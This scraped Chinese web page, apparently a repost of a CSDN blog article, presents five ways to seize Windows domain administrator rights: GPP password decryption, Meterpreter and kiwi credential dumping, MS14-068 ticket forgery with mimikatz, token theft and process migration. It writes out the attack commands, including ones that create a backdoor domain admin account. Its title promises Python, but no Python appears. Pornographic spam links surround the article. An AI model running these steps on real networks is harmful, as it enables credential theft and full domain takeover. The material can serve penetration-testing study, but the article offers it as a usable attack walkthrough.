一区二区三区在线-一区二区三区亚洲视频-一区二区三区亚洲-一区二区三区午夜-一区二区三区四区在线视频-一区二区三区四区在线免费观看

腳本之家,腳本語言編程技術及教程分享平臺!
分類導航

Python|VBS|Ruby|Lua|perl|VBA|Golang|PowerShell|Erlang|autoit|Dos|bat|

服務器之家 - 腳本之家 - Python - Python安全獲取域管理員權限幾種方式操作示例

Python安全獲取域管理員權限幾種方式操作示例

2022-01-25 00:03Bypass-- Python

在不考慮直接攻擊域控的情況下,如何快速獲取域管理員權限呢?本文分享幾種常見的獲取域管理員權限的方式,有需要的朋友可以借鑒參考下

在大多數情況下,攻擊者可以通過定位域管理員所登錄的服務器,利用漏洞獲取服務器system權限,找到域管理的賬號、進程或是身份驗證令牌,從而獲取域管理員權限

 

第1種方式:利用GPP漏洞獲取域管理權限

SYSVOL是域內的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導致安全問題。

(1)訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。

Python安全獲取域管理員權限幾種方式操作示例

(2)使用kali自帶的gpp-decrypt進行破解,從而獲取域賬號密碼,直接登錄域管理員賬號獲取訪問權限。

Python安全獲取域管理員權限幾種方式操作示例

 

第2種方式:獲取服務器明文登錄密碼

使用kiwi模塊需要system權限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system。提到system有兩個方法,一是當前的權限是administrator用戶,二是利用其它手段先提權到administrator用戶。然后administrator用戶可以直接getsystem到system權限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加載kiwi模塊

load kiwi

列舉系統中的明文密碼

creds_all

Python安全獲取域管理員權限幾種方式操作示例

 

第3種方式:使用MS14-068漏洞進行提權

MS14068是一個能夠使普通用戶提權到域控權限的權限提升漏洞。攻擊者可以通過構造特定的請求包來達到提升權限的目的。

攻擊流程:

第一步:利用MS14-068偽造生成TGT

MS14-068.exe -u [email protected] -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

Python安全獲取域管理員權限幾種方式操作示例

第二步:利用mimikatz將工具得到的TGT票據寫入內存,創建緩存證書

mimikatz#kerberos::ptc [email protected]

Python安全獲取域管理員權限幾種方式操作示例

第三步:獲取域管理員權限。創建一個 test 賬號并加入域管理員組,從而隨時可以登錄域控主機進行操作。

PsExec.exe \\dc cmd.exe 
// 添加test用戶
net user test abc123! /add /domain
// 把 test 用戶添加進域管理員組
net group "domain admins"  test /add /domain
// 查看域管理員
net group "domain admins" /domain

 

第4種方式:竊取域管理員令牌

當有域控賬戶登陸至服務器時可使用令牌模擬進行滲透取得域控權限。

1、入侵域管理員所在的服務器,竊取域管理員的令牌,從而控制整個域。

Python安全獲取域管理員權限幾種方式操作示例

2、直接在meterpreter shell上執行添加域管理員

add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址

 

第5種方式:進程遷移

入侵了域管理員所登錄的服務器,將進程遷移到域管理員所運行的進程,就可以獲得域管理員權限。

1、獲取域管理員列表

net group "Domain Admins" /domain

Python安全獲取域管理員權限幾種方式操作示例

2、利用ps找到域管理員(TEST\bypass)所運行的進程,然后將shell進程遷移到域管理員所運行的進程中,成功后就獲得了域管理員權限。如下圖所示:

Python安全獲取域管理員權限幾種方式操作示例

3、輸入shell命令獲取OS shell,在本機上使用Windows命令添加新的域管理員:

// 添加test用戶
net user test admin@123 /add /domain
// 把 test 用戶添加進域管理員組
net group "domain admins"  test /add /domain

4、成功添加了域管理員賬號test。

Python安全獲取域管理員權限幾種方式操作示例

以上就是Python安全獲取域管理員權限幾種方式操作示例的詳細內容,更多關于Python獲取域管理員權限方式的資料請關注服務器之家其它相關文章!

原文鏈接:https://blog.csdn.net/qq_23936389/article/details/120714817

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 国产综合欧美日韩视频一区 | 青青草亚洲 | 国产男人搡女人免费视频 | 久久全国免费久久青青小草 | 久久综合香蕉久久久久久久 | 日韩福利一区 | 亚洲精品高清中文字幕完整版 | 日本无遮挡亲吻膜下面免费 | 大香焦在线观看 | 青草视频免费观看 | 成人免费一区二区三区在线观看 | 女人张开腿 让男人桶个爽 免费观看 | 高h肉爽文农民工 | 日韩亚洲欧美理论片 | 91在线视频国产 | 九九在线精品亚洲国产 | 亚洲另类中文字幕 | 好大好硬好深好爽想要小雪 | 日本精品久久久久中文字幕 1 | 免费福利资源站在线视频 | 白丝憋尿| 久九九精品免费视频 | 欧美成人tv在线观看免费 | 国产成人免费片在线视频观看 | 成人男女啪啪免费观看网站 | 男人狂躁女人下半身 | 久久婷婷五月综合色丁香 | 欧美精品久久久久久久影视 | 青青草视频国产 | 日韩欧美综合在线二区三区 | 1024在线视频精品免费 | 久久日韩精品无码一区 | pron在线观看 | 97色资源| 成年性午夜免费视频网站不卡 | 欧美午夜精品久久久久久黑人 | 华人亚洲欧美精品国产 | 青草青草久热精品视频在线网站 | 欧美国产合集在线视频 | 花核调教 | 91高清国产经典在线观看 |